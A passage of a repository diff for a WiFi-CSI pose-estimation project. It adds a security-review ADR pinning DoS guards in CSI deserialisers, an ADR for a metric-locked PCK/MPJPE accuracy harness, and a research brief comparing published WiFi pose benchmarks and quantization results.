`welford|von_mises|biquad|y1|y2|running_mean|accumulat|voxel|self.*+=` matched
|
||||
only the `InvalidState` *error* enum variant, "reset state" doc comments, and a
|
||||
test-only LCG — **zero** stateful logic. The only float math in core is
|
||||
construction-time projection (`CsiFrame::new` → amplitude/phase via `mapv`) and
|
||||
pure stateless `utils` functions; nothing persists across frames.
|
||||
- **Corroboration:** `wifi-densepose-calibration::Features::from_series`
|
||||
(`extract.rs:103–133`) already filters non-finite samples → `Features::ZERO`.
|
||||
The downstream fixes are independently re-implemented, confirming each crate
|
||||
rolls its own accumulator and each local fix is correct and complete. **A fix
|
||||
in core would be a no-op (there is nothing to fix).**
|
||||
|
||||
Consequence: the NaN-state-poisoning class is a *downstream-local* pattern, not a
|
||||
core-rooted defect. No hidden fourth instance exists in the shared primitive.
|
||||
|
||||
### Findings (all pins — guards already present, now tested)
|
||||
|
||||
| # | Location | Guard (pre-existing) | Regression pin | Evidence (MEASURED) |
|
||||
|---|----------|----------------------|----------------|---------------------|
|
||||
| 1 | `core` `types.rs:801` `from_canonical_bytes` | `saturating_mul` shape-vs-length check before `Vec::with_capacity(rows*cols)` | `canonical_decode_oversized_shape_is_bounded_not_allocated` | With guard removed: **panics `capacity overflow` at `types.rs:801`**; with guard: passes |
|
||||
| 2 | `core` `types.rs` decoder | typed `CanonicalDecodeError`, never panics | `canonical_decode_never_panics_on_arbitrary_bytes` (fuzz sweep) | panic-free on arbitrary bytes |
|
||||
| 3 | `cli` `calibrate.rs:276–291` | length check `buf.len() < 20 + n_pairs*2` before `Array2::zeros(n_antennas*n_subcarriers)` | `test_parse_csi_packet_oversized_claim_is_rejected_not_allocated` | 255×65535 claim in a 2 KB packet → `None` (no allocation) |
|
||||
| 4 | `cli` `calibrate.rs` parser | `None`-returning on malformed input | `test_parse_csi_packet_never_panics_on_arbitrary_bytes` (fuzz sweep) | panic-free on arbitrary UDP bytes |
|
||||
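Findings 1 and 3 share one pattern: validate the claimed shape against the bytes actually received before allocating anything. The sketch below illustrates it with a hypothetical packet layout (a 20-byte header with the antenna count in byte 0 and a little-endian subcarrier count in bytes 1 and 2, then two bytes per pair). The header length and the two-bytes-per-pair rule match the check quoted in the table; the field offsets and the return type are assumptions.

```rust
const HEADER_LEN: usize = 20;

/// Parses a packet under the assumed layout, returning the claimed shape and
/// the (I, Q) samples, or None if the claim exceeds the received bytes.
fn parse_csi_packet(buf: &[u8]) -> Option<(usize, usize, Vec<(i8, i8)>)> {
    if buf.len() < HEADER_LEN {
        return None;
    }
    let n_antennas = buf[0] as usize;
    let n_subcarriers = u16::from_le_bytes([buf[1], buf[2]]) as usize;
    // Overflow-checked size arithmetic, done before any allocation.
    let n_pairs = n_antennas.checked_mul(n_subcarriers)?;
    let needed = n_pairs.checked_mul(2)?.checked_add(HEADER_LEN)?;
    if buf.len() < needed {
        return None;
    }
    // Allocation is now bounded by the packet size, not by the header claim.
    let iq = buf[HEADER_LEN..needed]
        .chunks_exact(2)
        .map(|c| (c[0] as i8, c[1] as i8))
        .collect();
    Some((n_antennas, n_subcarriers, iq))
}
```

A 2 KB packet claiming 255×65535 pairs fails the length check and returns `None`, mirroring the evidence column for finding 3.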
|
||||
### Dimensions confirmed clean (with evidence)
|
||||
|
||||
1. **Panic-on-adversarial-input = 0** — `from_canonical_bytes` returns a typed
|
||||
error for every malformed class; `parse_csi_packet` returns `None`. Both
|
||||
fuzz-swept panic-free.
|
||||
2. **NaN handling** — `Confidence::new` rejects NaN
|
||||
(`!(0.0..=1.0).contains(&NaN)` ⇒ `Err`); `compute_bounding_box` /
|
||||
`to_flat_array` are NaN-tolerant (f32 min/max ignore NaN).
|
||||
3. **Empty-frame safety** — `amplitude_variance` / `mean_amplitude` are
|
||||
panic-free on an empty `Array2` (ndarray 0.17 returns finite / `None`).
|
||||
4. **Unbounded-memory DoS** — bounded in both deserialisers (findings 1 & 3).
|
||||
5. **Path traversal** — `calibrate-serve` defends every client-supplied
|
||||
`room_id`/`bank`/`baseline` via `sanitize_room_id` (`[A-Za-z0-9_-]`, 64-char
|
||||
cap) with existing tests; bearer-auth gate + non-loopback-bind warning present.
|
||||
`mat export` writes to an operator-supplied `PathBuf` (acceptable CLI behavior).
|
||||
6. **Secrets** — `--token` is read from `CALIBRATE_TOKEN` env, never embedded.
|
||||
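Item 2 relies on two standard floating-point behaviours: a range `contains` check is false for NaN, and `f32::max`/`f32::min` return the non-NaN operand. A short sketch, with a simplified `Confidence` type and a hypothetical `max_ignoring_nan` helper standing in for the real code:

```rust
/// Simplified stand-in for the crate's confidence newtype.
#[derive(Debug, Clone, Copy, PartialEq)]
struct Confidence(f32);

impl Confidence {
    /// NaN fails both comparisons inside `contains`, so it is rejected
    /// along with every out-of-range value.
    fn new(value: f32) -> Result<Confidence, String> {
        if !(0.0f32..=1.0).contains(&value) {
            return Err(format!("confidence out of range: {value}"));
        }
        Ok(Confidence(value))
    }
}

/// Hypothetical helper: folds with `f32::max`, which ignores a NaN operand
/// when the other operand is a number.
fn max_ignoring_nan(values: &[f32]) -> f32 {
    values.iter().copied().fold(f32::NEG_INFINITY, f32::max)
}
```

Writing the guard as a negated `contains` matters: the equivalent-looking `value < 0.0 || value > 1.0` is false for NaN and would let it through.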
|
||||
## Validation
|
||||
|
||||
- `cargo test -p wifi-densepose-core` → **35 → 37** lib passed, 0 failed (+3 doctests)
|
||||
- `cargo test -p wifi-densepose-cli --no-default-features` → **24 → 26** passed, 0 failed
|
||||
- `cargo test --workspace --no-default-features` → **exit 0**, 0 failed
|
||||
- `python archive/v1/data/proof/verify.py` → **VERDICT: PASS**, hash
|
||||
`f8e76f21a0f9852b70b6d9dd5318239f6b20cbcb4cdd995863263cecdc446f7a` **unchanged**
|
||||
(core/cli are off the signal proof path — confirms no pipeline alteration)
|
||||
|
||||
## Consequences
|
||||
|
||||
### Positive
|
||||
- Two CSI deserialisers (the untrusted-input boundary of both the library root
|
||||
and the network-facing CLI) now have their DoS guards pinned against
|
||||
regression — a future refactor that drops a length check fails CI.
|
||||
- The NaN-state-poisoning class is settled as downstream-local; reviewers no
|
||||
longer need to suspect a shared-root defect, and the three prior local fixes
|
||||
are confirmed complete.
|
||||
|
||||
### Negative
|
||||
- None. Test-only change; no behavior or API change.
|
||||
|
||||
### Neutral
|
||||
- The `core` portion is also noted in ADR-127 §9 (shared security-review log);
|
||||
this ADR is the canonical record for the `wifi-densepose-cli` review.
|
||||
|
||||
## Links
|
||||
- ADR-127 — HOMECORE state machine (shared security-review log, §9)
|
||||
- ADR-136 — pre-existing CSI deserialiser DoS acceptance criteria
|
||||
- ADR-151 — per-room calibration (`calibrate`/`calibrate-serve` surfaces)
|
||||
@@ -0,0 +1,123 @@
|
||||
# ADR-173: Metric-Locked PCK/MPJPE Accuracy Harness
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| **Status** | Accepted — implemented, deterministically tested |
|
||||
| **Date** | 2026-06-15 |
|
||||
| **Deciders** | ruv |
|
||||
| **Codename** | **METRIC-LOCK** |
|
||||
| **Amends** | ADR-155 (generalizes the torso-only `metrics_core::pck_canonical` to a selectable normalization) |
|
||||
| **Motivated by** | `docs/research/sota-nn-train-benchmark-brief.md` (PR #1090) |
|
||||
|
||||
## Context
|
||||
|
||||
The SOTA research brief (PR #1090) identified the single biggest
|
||||
threat to any "beyond-SOTA" accuracy claim this project makes: **metric
|
||||
ambiguity**. Three PCK@20 numbers circulate, computed under three *different and
|
||||
unstated* normalizations, so they cannot be compared:
|
||||
|
||||
- **96.09–96.61%** — WiFlow-STD reproduction, **image/bounding-box-normalized** PCK (the looser convention).
|
||||
- **81.63%** — an internal MM-Fi number reported as **"torso-PCK"** (tighter).
|
||||
- **61.1%** — GraphPose-Fi (arXiv 2511.19105), **standard torso-diameter** PCK on the MM-Fi random split (the academic frontier).
|
||||
|
||||
The project has been burned by this twice: a previously-published 92.9% was
|
||||
retracted because it used **absolute-pixel** normalization, not torso. Until
|
||||
there is *one canonical, documented, tested* PCK definition — and every reported
|
||||
number carries the definition it was computed under — no accuracy comparison is
|
||||
credible, and the "prove everything" bar cannot be met for the benchmark half of
|
||||
the work.
|
||||
|
||||
This is measurement infrastructure, not an accuracy claim. The deliverable's job
|
||||
is to make the metric **unambiguous and reproducible**, so future numbers are
|
||||
comparable and an unlabeled PCK is structurally impossible.
|
||||
|
||||
## Decision
|
||||
|
||||
Add a metric-locked accuracy harness as a new module
|
||||
`v2/crates/wifi-densepose-train/src/accuracy.rs` (404 non-test lines; inline
|
||||
deterministic tests bring the file to 708), re-exported at the crate root. It
|
||||
**extends, not duplicates** — it reuses `metrics_core`'s geometric primitives
|
||||
(`bounding_box_diagonal`, canonical hip indices `CANON_LEFT_HIP/RIGHT_HIP`), so
|
||||
there remains exactly one implementation of each geometric reference; the
|
||||
existing ADR-155 `pck_canonical` (torso-only) is unchanged and this generalizes
|
||||
it.
|
||||
|
||||
### Public API
|
||||
|
||||
- `enum PckNormalization { TorsoDiameter, BoundingBoxDiagonal, AbsolutePixels(f32) }`
|
||||
— the three conventions the three historical numbers used, now **explicit and
|
||||
selectable**. `.label()` / `.tolerance(...)`.
|
||||
- `pck_at(pred, gt, vis, k, norm) -> (correct, total, pck)` — PCK@k =
|
||||
fraction of *visible* keypoints whose predicted-vs-GT distance ≤ the tolerance,
|
||||
where tolerance = `k%` of the chosen normalizer (or an absolute threshold for
|
||||
`AbsolutePixels`).
|
||||
- `mpjpe(pred, gt, vis) -> f32` — mean per-joint position error (2D/3D, coordinate
|
||||
units; mm for mm inputs). Re-exported crate-root as `pck_mpjpe` to avoid
|
||||
colliding with the existing `eval::mpjpe`.
|
||||
- `struct PoseAccuracy { pck_at: BTreeMap<u8,f32>, mpjpe, normalization, n_keypoints, n_frames }`
|
||||
— **a reported number always carries its `normalization`**; an unlabeled PCK is
|
||||
structurally impossible to produce through this surface.
|
||||
- `struct PoseFrame { pred, gt, visibility }` + `accuracy_report(frames, ks, norm) -> PoseAccuracy`
|
||||
(micro-averaged over keypoints).
|
||||
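As an illustration of the `mpjpe` entry in the list above, the following sketch computes the mean Euclidean error over visible joints for any coordinate dimension. It is written from the description only: the const-generic signature is an assumption, and returning `0.0` when no joint is visible is assumed by analogy with the empty-report behaviour rather than confirmed by the source.

```rust
/// Mean per-joint position error over visible joints, in input units.
fn mpjpe<const D: usize>(pred: &[[f32; D]], gt: &[[f32; D]], vis: &[bool]) -> f32 {
    let (mut sum, mut n) = (0.0f32, 0usize);
    for ((p, g), &visible) in pred.iter().zip(gt).zip(vis) {
        if !visible {
            continue; // invisible joints contribute neither error nor count
        }
        let squared: f32 = p.iter().zip(g).map(|(a, b)| (a - b).powi(2)).sum();
        sum += squared.sqrt();
        n += 1;
    }
    if n == 0 {
        0.0 // assumed: no visible joints yields 0.0 rather than NaN
    } else {
        sum / n as f32
    }
}
```

One reading of the 2D row in the test table: a joint off by (3, 4) has error 5, and averaging it with one exact joint gives 2.5.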
|
||||
### Correctness is proven by hand-computed deterministic tests (no GPU, no data)
|
||||
|
||||
The tests construct synthetic keypoint sets whose PCK/MPJPE can be computed by
|
||||
hand, and assert the harness matches. Highlights (all pass):
|
||||
|
||||
| Test | Construction | Expected |
|
||||
|------|--------------|----------|
|
||||
| perfect_prediction | pred==gt | PCK=1.0 (all 3 norms), MPJPE=0 |
|
||||
| all_just_outside | every error just past τ@20 | PCK=0.0 |
|
||||
| half_in_half_out | 2 exact, 2 just outside | PCK=0.5 |
|
||||
| **three_normalizations (KEY PROOF)** | identical pred; nose err .06, shoulder .10, hips exact | torso=**0.50**, bbox=**1.00**, abs(.08)=**0.75** |
|
||||
| mpjpe_2d / mpjpe_3d | (3,4)→5 / (1,2,2)→3 | 2.5 / 3.0 |
|
||||
| mpjpe_excludes_invisible | invisible joint err 100 ignored | 5.0 |
|
||||
| zero_torso_unscoreable | coincident hips | `(0,0,0.0)`, **not** false-perfect |
|
||||
| no_visible_keypoints | vis=∅ | `(0,0,0.0)` |
|
||||
| nan_coords | one NaN pred coord | counted wrong, **no panic** |
|
||||
| empty report | no frames | 0.0, **not** NaN |
|
||||
| bbox≥torso ordering | same frames | bbox-PCK ≥ torso-PCK |
|
||||
|
||||
### The key proof (the ambiguity is real and quantified)
|
||||
|
||||
Identical predictions, three declared normalizations → **0.50 / 1.00 / 0.75**.
|
||||
Mechanism: the bbox diagonal `√(0.20² + 0.80²) = 0.825` is ~4× the hip-span torso
|
||||
`0.20`, so τ@20 is 0.165 (bbox) vs 0.040 (torso) — the looser image-normalized
|
||||
convention passes joints the strict torso convention rejects. This is *exactly*
|
||||
why 96% / 81.6% / 61% cannot be lined up without declaring the normalization, as demonstrated
|
||||
in-code.
|
||||
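The arithmetic above can be reproduced with a small standalone sketch. This is not the harness in `accuracy.rs`: the hip indices, the 2D-only signature, and the choice to take the bounding box over the ground-truth keypoints are assumptions made for illustration. Only the enum variants and the `(correct, total, pck)` return shape follow the API list.

```rust
#[derive(Debug, Clone, Copy)]
enum PckNormalization {
    TorsoDiameter,
    BoundingBoxDiagonal,
    AbsolutePixels(f32),
}

// Hypothetical keypoint indices for this sketch only.
const LEFT_HIP: usize = 2;
const RIGHT_HIP: usize = 3;

fn dist(a: [f32; 2], b: [f32; 2]) -> f32 {
    (a[0] - b[0]).hypot(a[1] - b[1])
}

/// Tolerance for PCK@k, or None when the reference length is unusable.
fn tolerance(gt: &[[f32; 2]], k: u8, norm: PckNormalization) -> Option<f32> {
    let reference = match norm {
        PckNormalization::AbsolutePixels(t) => return Some(t),
        PckNormalization::TorsoDiameter => match (gt.get(LEFT_HIP), gt.get(RIGHT_HIP)) {
            (Some(&l), Some(&r)) => dist(l, r),
            _ => return None,
        },
        PckNormalization::BoundingBoxDiagonal => {
            let (mut lo, mut hi) = ([f32::INFINITY; 2], [f32::NEG_INFINITY; 2]);
            for p in gt {
                for d in 0..2 {
                    lo[d] = lo[d].min(p[d]);
                    hi[d] = hi[d].max(p[d]);
                }
            }
            dist(lo, hi)
        }
    };
    if reference > 0.0 && reference.is_finite() {
        Some(f32::from(k) / 100.0 * reference)
    } else {
        None // e.g. coincident hips: unscoreable, not falsely perfect
    }
}

fn pck_at(
    pred: &[[f32; 2]],
    gt: &[[f32; 2]],
    vis: &[bool],
    k: u8,
    norm: PckNormalization,
) -> (usize, usize, f32) {
    let Some(tol) = tolerance(gt, k, norm) else {
        return (0, 0, 0.0);
    };
    let (mut correct, mut total) = (0usize, 0usize);
    for ((p, g), &visible) in pred.iter().zip(gt).zip(vis) {
        if !visible {
            continue;
        }
        total += 1;
        // A NaN distance compares false, so it counts as wrong without panicking.
        if dist(*p, *g) <= tol {
            correct += 1;
        }
    }
    let pck = if total == 0 { 0.0 } else { correct as f32 / total as f32 };
    (correct, total, pck)
}
```

With ground truth nose (0.5, 0.1), shoulder (0.5, 0.3), hips (0.4, 0.9) and (0.6, 0.9), and predictions off by 0.06 at the nose and 0.10 at the shoulder, the three normalizations score the same prediction as 2/4, 4/4, and 3/4.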
|
||||
## Validation
|
||||
|
||||
- `cargo test -p wifi-densepose-train --no-default-features` → lib **191 → 206**
|
||||
(+15), `test_metrics` **12 → 14** (+2), doc-tests 8 — **0 failed**.
|
||||
- `cargo test --workspace --no-default-features` → **exit 0**, 0 failed.
|
||||
- `python archive/v1/data/proof/verify.py` → **VERDICT: PASS**, hash
|
||||
`f8e76f21a0f9852b70b6d9dd5318239f6b20cbcb4cdd995863263cecdc446f7a` **unchanged**
|
||||
(off the signal proof path — confirms no pipeline alteration).
|
||||
|
||||
## Consequences
|
||||
|
||||
### Positive
|
||||
- The three historical PCK numbers can now be **recomputed under one declared
|
||||
definition** and compared honestly. The retracted-number class of error
|
||||
(silent normalization mismatch) is structurally prevented going forward.
|
||||
- Establishes the measurement substrate for the beyond-SOTA target: GraphPose-Fi
|
||||
cross-environment **PCK@20 = 12.9%** (standard torso PCK) is now a number this
|
||||
harness can produce comparably.
|
||||
|
||||
### Negative
|
||||
- None functional. The harness is additive; no existing metric path changed.
|
||||
|
||||
### Neutral
|
||||
- Producing actual model numbers under this harness requires the trained models +
|
||||
datasets (MM-Fi) and, for cross-domain splits, is the next sub-deliverable of
|
||||
the benchmark/optimization milestone — out of scope here (this ADR is the
|
||||
*instrument*, not the *reading*).
|
||||
|
||||
## Links
|
||||
- ADR-155 — metric core (`pck_canonical`, torso-only) — generalized here
|
||||
- ADR-152 — WiFi-Pose SOTA 2026 intake / WiFlow-STD benchmark
|
||||
- `docs/research/sota-nn-train-benchmark-brief.md` — the motivating gap analysis
|
||||
- GraphPose-Fi — arXiv 2511.19105 (verified cross-env PCK@20 = 12.9% anchor)
|
||||
@@ -0,0 +1,147 @@
|
||||
# SOTA Evidence Brief — `wifi-densepose-nn` / `wifi-densepose-train` Benchmark ADR Seed
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| **Date** | 2026-06-14 |
|
||||
| **Author** | deep-research (Opus) |
|
||||
| **Purpose** | Seed a future benchmark/optimization ADR for the NN-inference (`wifi-densepose-nn`) and training (`wifi-densepose-train`) crates |
|
||||
| **Scope** | The DELTA beyond what ADR-152 / ADR-150 / ADR-015 already establish — current published WiFi-CSI pose SOTA, winning architectures, edge-quantization SOTA, and a defensible benchmark-suite design |
|
||||
| **Ethos** | Every claim graded PEER-REVIEWED / PREPRINT / VENDOR-CLAIM / BLOG, with MEASURED-on-public-benchmark distinguished from marketing. Numbers that could not be verified are flagged. No fabricated citations. |
|
||||
|
||||
> **Citation discipline carried in from ADR-152 §2.2:** preprint accuracy numbers are CLAIMED until reproduced on our hardware. The project has already retracted its own "92.9% PCK@20" and "shipped-WiFlow-STD 97.25%" figures after measurement; this brief inherits that bar.
|
||||
|
||||
---
|
||||
|
||||
## 1. Executive summary
|
||||
|
||||
**Where the project stands vs the 2026 frontier.** The repo is, by the evidence already in-tree, *ahead of most academic groups on benchmark hygiene* and roughly *at parity on capability* — but the two are measured on incompatible yardsticks, which is the single biggest risk to any "beyond-SOTA" claim.
|
||||
|
||||
- The project's headline reproductions (`benchmarks/wiflow-std/RESULTS.md`) are MEASURED and rigorous: WiFlow-STD retrained to **96.09–96.61% PCK@20** on the authors' own 360k-window 2D dataset (RTX 5080), shipped checkpoint REFUTED, dataset/code defects documented. This is a genuinely strong, reproducible result.
|
||||
- **But that number is not on a standard public benchmark.** WiFlow-STD's dataset is self-collected (5 subjects, 15 keypoints, 2D, in-domain random split, hardware unspecified). The academic frontier on the *standard* public 3D benchmark (MM-Fi) reports **PCK@20 ≈ 61% / MPJPE ≈ 161 mm random-split** (GraphPose-Fi, Nov 2025) — a *harder* metric (3D, mm-scale, standard PCK normalization). The project's own AetherArena MM-Fi number (**81.63% torso-PCK@20 in-domain**, ADR-150) uses a *torso-normalized PCK* that is looser than GraphPose-Fi's standard PCK, so the three numbers (96% / 81.6% / 61%) **cannot be lined up** without a unified harness. Making them comparable IS the highest-value work item.
|
||||
- The deployment frontier — **cross-subject / cross-environment generalization** — is where everyone collapses, the project included (ADR-150: 81.63% in-domain → ~11.6% leakage-free cross-subject). GraphPose-Fi independently confirms the cliff (61.1% random → 12.9% cross-environment PCK@20). This is the real research target, not in-domain PCK.
|
||||
|
||||
**Top 3 highest-value optimization/benchmark targets:**
|
||||
|
||||
1. **A unified, metric-locked accuracy harness in `wifi-densepose-train`** that scores any model under *one* explicit PCK definition (normalization, keypoint convention, split) so WiFlow-STD-repro, AetherArena/MM-Fi, and GraphPose-Fi numbers become directly comparable. Without this, no "beyond-SOTA" claim survives the "prove it" bar — the project has already been burned twice by metric ambiguity (the retracted 92.9% used absolute, not torso-normalized, PCK).
|
||||
2. **A QAT path for the WiFlow-STD-class edge model.** The in-tree edge work (`RESULTS.md`) has *fully characterized PTQ* (static QDQ conv-only is the int8 sweet spot; dynamic int8 is a no-op on this all-conv architecture) and found the **half model (843k params) strictly dominates the published 2.23M** and **tiny (56k, 295 KB ONNX fp32) holds 94.1% PCK@20**. The one untested lever is **quantization-aware training**, which the general literature says recovers most of the PTQ accuracy gap. That is the next defensible edge win.
|
||||
3. **Criterion-backed regression benches wired into CI** for the real Candle/ONNX forward path. The benches *exist* (`wifi-densepose-nn/benches/{inference,onnx,native_conv}_bench.rs`, `wifi-densepose-train/benches/training_bench.rs`) and `benchmarks/edge-latency/RESULTS.md` shows the methodology is sound (host≠ESP32 caveat made explicit). The gap is turning point-in-time captures into committed regression baselines.
|
||||
|
||||
---
|
||||
|
||||
## 2. Findings per research question
|
||||
|
||||
### RQ1 — Latest WiFi-CSI pose SOTA (2024–2026): published PCK@20 / MPJPE on the standard public benchmarks
|
||||
|
||||
The crucial framing: **"WiFi pose SOTA" splits into two non-comparable tracks** — 3D pose on MM-Fi/Person-in-WiFi-3D (mm-scale MPJPE, standard PCK) vs 2D pose on self-collected sets (image-normalized PCK). The project's flagship reproduction lives in the second track; the academic frontier lives in the first.
|
||||
|
||||
| Method | Venue / Year | Benchmark + split | PCK@20 | MPJPE | Grade |
|---|---|---|---|---|---|
| **GraphPose-Fi** (arXiv [2511.19105](https://arxiv.org/abs/2511.19105)) | PREPRINT, Nov 2025 | MM-Fi P1, **random split** | **61.1%** | **160.6 mm** (PA-MPJPE 105.0) | numbers MEASURED-in-study (preprint); beats MetaFi++, HPE-Li, DT-Pose |
| GraphPose-Fi | same | MM-Fi P1, **cross-subject** | 44.2% | 210.5 mm | same |
| GraphPose-Fi | same | MM-Fi P1, **cross-environment** | 12.9% | 302.7 mm | same — the generalization cliff |
| **DT-Pose** (arXiv [2501.09411](https://arxiv.org/abs/2501.09411)) | PREPRINT (ICLR'25 OpenReview [aPnLQ6WfQQ](https://openreview.net/forum?id=aPnLQ6WfQQ)), Jan 2025; code [cseeyangchen/DT-Pose](https://github.com/cseeyangchen/DT-Pose) | MM-Fi (domain-gap + topology focus) | not cleanly extractable from abstract | reports MPJPE; self-supervised masked pretrain + topology decode | numbers NOT verified at exact-table level here — flagged |
| **Person-in-WiFi-3D** (CVPR 2024, [openaccess](https://openaccess.thecvf.com/content/CVPR2024/html/Yan_Person-in-WiFi_3D_End-to-End_Multi-Person_3D_Pose_Estimation_with_Wi-Fi_CVPR_2024_paper.html)) | **PEER-REVIEWED**, CVPR 2024 | own 97k-frame multi-person set | — (multi-person, not single-PCK) | **91.7 mm (1p) / 108.1 (2p) / 125.3 (3p)** 3D joint error | MEASURED (peer-reviewed); own dataset, not MM-Fi |
| **WiFlow-STD** (arXiv [2602.08661](https://arxiv.org/abs/2602.08661), [DY2434 repo](https://github.com/DY2434/WiFlow-WiFi-Pose-Estimation-with-Spatio-Temporal-Decoupling)) | PREPRINT, Apr 2026 | self-collected, 5-subj, **2D, in-domain random** | 97.25% (claimed) | 0.007 m (image-norm) | paper numbers CLAIMED; **project reproduced 96.09–96.61% (MEASURED, RTX 5080)** after repairing dataset/code |
| **PerceptAlign** (arXiv [2601.12252](https://arxiv.org/abs/2601.12252)) | PREPRINT + MobiCom'26 acceptance | own 7-layout cross-domain 3D set | — | 222.4 mm (Scene4) / 317.1 (Scene5), claims −54% cross-env vs SOTA | CLAIMED (preprint); failure mode corroborated |
| **Project AetherArena** (ADR-150, [issue #876](https://github.com/ruvnet/RuView/issues/876)) | internal | MM-Fi, **random split**, **torso-PCK** | **81.63% torso-PCK@20** | — | MEASURED-internal; **torso-PCK ≠ GraphPose-Fi standard PCK** |
| **Project WiFlow-STD repro** (`benchmarks/wiflow-std/RESULTS.md`) | internal | their data, their split | **96.09–96.61%** | 0.0094–0.0098 m | MEASURED-internal (RTX 5080) |
|
||||
|
||||
**How the project's ~96% compares to the frontier:** It is *not directly comparable*. The 96% is on an easier task (2D, in-domain, image-normalized PCK, single-environment, 5 subjects) than GraphPose-Fi's 61.1% (3D, standard PCK, mm-scale). The project's own MM-Fi-track number (81.63% torso-PCK@20) *appears* to beat GraphPose-Fi's 61.1%, **but only because torso-PCK is a looser normalization** — the project explicitly flags this (ADR-150 cites beating "MultiFormer's 72.25%" under the *same* torso metric, not GraphPose-Fi's). The honest statement: **the project is competitive on in-domain MM-Fi under its own torso metric, and collapses cross-subject exactly as the published frontier does.** No public number lets the project claim "beyond-SOTA" today.
|
||||
|
||||
### RQ2 — What's winning architecturally now (2025–2026)
|
||||
|
||||
The clear trend across the verified 2025–2026 papers:
|
||||
|
||||
- **Graph / skeleton-aware decoders are the current academic SOTA on MM-Fi.** GraphPose-Fi (PREPRINT, Nov 2025) wins by injecting anatomical graph structure into the decoder — exactly the `GraphPose-Fi-style skeleton-aware graph head` ADR-150 §2.2 already names as the planned decoder. *The project's architecture direction matches the frontier.*
|
||||
- **Self-supervised masked pretraining (MAE) is the cross-domain lever, not capacity.** UNSW MAE study (arXiv [2511.18792](https://arxiv.org/abs/2511.18792), PREPRINT, Nov 2025): cross-domain gains scale **log-linearly with pretraining data, unsaturated at 1.3M samples**; ViT-Base adds only 0.4–0.9% over ViT-Small. Recipe: **80% masking, (30,3) small patches**. DT-Pose (arXiv 2501.09411) independently uses masked pretraining + topology constraints for the domain gap. *Caveat (MEASURED in ADR-152 §2.3): UNSW's downstream tasks are classification, not pose — pose transfer remains a hypothesis. The project's own measurement (b) found WiFlow-STD pretrained features give optimization transfer but NOT feature transfer to ESP32 CSI.*
|
||||
- **Spatio-temporal decoupling is the efficiency lever.** WiFlow-STD's whole contribution is decoupling spatial and temporal CSI processing to hit 2.23M params. The project verified the params/FLOPs (MEASURED) and then **beat it**: the half-model (843k) matches accuracy with 0.38× params (`RESULTS.md` efficiency sweep).
|
||||
- **Geometry/layout conditioning is the cross-layout lever.** PerceptAlign (MobiCom'26): fusing transceiver-position embeddings + two-checkerboard calibration, claimed −60% cross-domain. ADR-152 §2.1 already adopted this (`NodeGeometry`, geometry embeddings).
|
||||
- **NOT winning / absent:** diffusion models for CSI pose did not surface in the verified frontier. Full DensePose-UV regression from commodity WiFi remains undemonstrated (ADR-152 F5, MEASURED by full-text screening). No 2025–2026 paper was found that *beats the project's current direction* — the project is tracking, not trailing, the architecture frontier.
|
||||
|
||||
**Verdict RQ2:** the winning stack (MAE pretrain → graph/skeleton decoder → geometry conditioning, ViT-Small-class capacity) is *already the planned ADR-150/152 stack*. The gain available is not a new architecture; it's (a) more heterogeneous pretraining data and (b) honest cross-domain measurement.
|
||||
|
||||
### RQ3 — Edge/quantized inference SOTA for small CSI pose models
|
||||
|
||||
The in-tree edge work (`benchmarks/wiflow-std/RESULTS.md` "Edge optimization" + "Static PTQ" + "Efficiency sweep") is already at or beyond what the public literature offers for this specific model class, and is MEASURED. Key findings to carry forward:
|
||||
|
||||
- **Dynamic INT8 is a trap on all-conv CSI models.** WiFlow-STD has **zero `nn.Linear` layers** (21 Conv1d + 22 Conv2d + BatchNorm). `torch.quantization.quantize_dynamic` quantizes 0% of params (dynamic quantization has no int8 conv kernels, so every conv layer stays fp32). MEASURED.
|
||||
- **Static QDQ conv-only PTQ is the int8 sweet spot.** PCK@20 96.60–96.63% (vs fp32 96.68%, dynamic 96.52%), 2.53 MB. All-ops QDQ is strictly worse (−1.4 pt). MEASURED.
|
||||
- **ONNX Runtime fp32 is the real CPU latency win**: 3.2 ms/window batch-1 vs torch 11.0 ms (~3.4×) at parity (2.4e-7). int8 is ~2× *slower* than ONNX fp32 at batch-1 (ConvInteger kernels). MEASURED.
|
||||
- **Smaller-than-published dominates.** half (843k) ≥ full on accuracy; **tiny (56k, 295 KB ONNX fp32, 0.66 ms/win, 94.1% PCK@20)** is the smallest deployable artifact. At tiny scale int8 is a *bad* trade (−1.43 pt for −47 KB). MEASURED.
|
||||
- **General QAT-vs-PTQ context (BLOG/VENDOR):** [NVIDIA TensorRT QAT blog](https://developer.nvidia.com/blog/achieving-fp32-accuracy-for-int8-inference-using-quantization-aware-training-with-tensorrt/), [Ultralytics QAT glossary](https://www.ultralytics.com/glossary/quantization-aware-training-qat), [ONNX Runtime quantization docs](https://onnxruntime.ai/docs/performance/model-optimizations/quantization.html): QAT "almost always" recovers accuracy PTQ loses on sensitive models; ONNX Runtime does NOT retrain (QAT must happen in PyTorch, then export QDQ). The [Onboard Optimization survey, arXiv 2505.08793](https://arxiv.org/pdf/2505.08793) (PREPRINT) covers on-device optimization broadly. These are *general* claims, not CSI-pose-specific — grade accordingly.
|
||||
- **Hailo / Pi target (CLAUDE.local.md):** the 4× Pi+Hailo cluster (Hailo-8 @ 26 TOPS / Hailo-10 @ 40 TOPS) needs a **HEF** compile path, which is its own toolchain (not ONNX/Candle). No in-tree HEF benchmark exists yet — this is a genuine gap for the edge-inference claim.
|
||||
|
||||
**Actionable for an inference-speed benchmark:** the honest comparand set is `{torch fp32, ONNX fp32, ONNX static-QDQ-conv-only int8, candle fp32}` × `{full, half, tiny}` on a fixed host, with the **host≠ESP32 / host≠Hailo caveat stated up front** (the `edge-latency/RESULTS.md` template already does this correctly). The one new datapoint worth producing: **QAT-int8 on the half model** to test whether QAT closes the PTQ −0.16 pt gap *and* keeps the size win.
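
For readers unfamiliar with the term, the numeric effect of a static quantize-dequantize (QDQ) pair can be sketched in a few lines of Rust. This is only an illustration under stated assumptions: per-tensor symmetric int8 scaling, a scale fixed ahead of time from calibration values, and hypothetical function names (`symmetric_scale`, `quantize`, `dequantize`, `fake_quant`). It does not model ONNX Runtime's calibrators, per-channel scales, or the conv-only node selection measured in `RESULTS.md`.

```rust
/// Per-tensor symmetric int8 scale: the largest calibration magnitude maps to 127.
/// (Assumption: symmetric, per-tensor; real toolchains offer other schemes.)
pub fn symmetric_scale(calibration: &[f32]) -> f32 {
    let max_abs = calibration.iter().fold(0.0f32, |m, v| m.max(v.abs()));
    if max_abs == 0.0 {
        1.0 // avoid a zero scale for an all-zero tensor
    } else {
        max_abs / 127.0
    }
}

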